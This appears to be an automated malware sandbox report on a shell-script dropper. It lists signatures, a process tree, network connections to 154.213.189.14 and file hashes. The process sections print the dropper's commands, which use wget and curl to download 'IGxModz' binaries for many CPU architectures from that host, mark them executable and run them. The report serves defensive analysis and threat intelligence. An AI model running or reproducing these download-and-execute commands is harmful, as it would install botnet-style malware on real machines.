| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-2b54cc0a1deb4caa8ff5b672da286b49-systemd-timedated.service-5q88EO]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| Hash | Value |
| --- | --- |
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:50
Reported
2024-11-21 08:54
Platform
debian9-mipsel-20240418-en
Max time kernel
28s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
| N/A | /tmp/3AvA | /tmp/3AvA | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /tmp/3AvA | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3AvA | /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh | N/A |
| File opened for modification | /tmp/IGxModz.arm4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGxModz.m68k | /usr/bin/curl | N/A |
Processes
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.x86]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.x86]
/bin/cat
[cat IGxModz.x86]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA x86]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mips]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mips]
/bin/cat
[cat IGxModz.mips]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA mips]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.mpsl]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.mpsl]
/bin/cat
[cat IGxModz.mpsl]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA mpsl]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm4]
/bin/cat
[cat IGxModz.arm4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm4]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm5]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm5]
/bin/cat
[cat IGxModz.arm5]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm5]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm6]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm6]
/bin/cat
[cat IGxModz.arm6]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm6]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.arm7]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.arm7]
/bin/cat
[cat IGxModz.arm7]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA arm7]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.ppc]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.ppc]
/bin/cat
[cat IGxModz.ppc]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA ppc]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.m68k]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.m68k]
/bin/cat
[cat IGxModz.m68k]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA m68k]
/usr/bin/wget
[wget http://154.213.189.14/bns/IGxModz.sh4]
/usr/bin/curl
[curl -O http://154.213.189.14/bns/IGxModz.sh4]
/bin/cat
[cat IGxModz.sh4]
/bin/chmod
[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-Tb0U3u]
/tmp/3AvA
[./3AvA sh4]
Network
| Country | Destination | Domain | Proto |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
| NL | 154.213.189.14:80 | 154.213.189.14 | tcp |
Files
/tmp/IGxModz.x86
| MD5 | 960b4fa9d5383373f0a1ea04929df01b |
| SHA1 | f78054d817db7742162a706b5d9f1fedcdf21140 |
| SHA256 | 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a |
| SHA512 | 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f |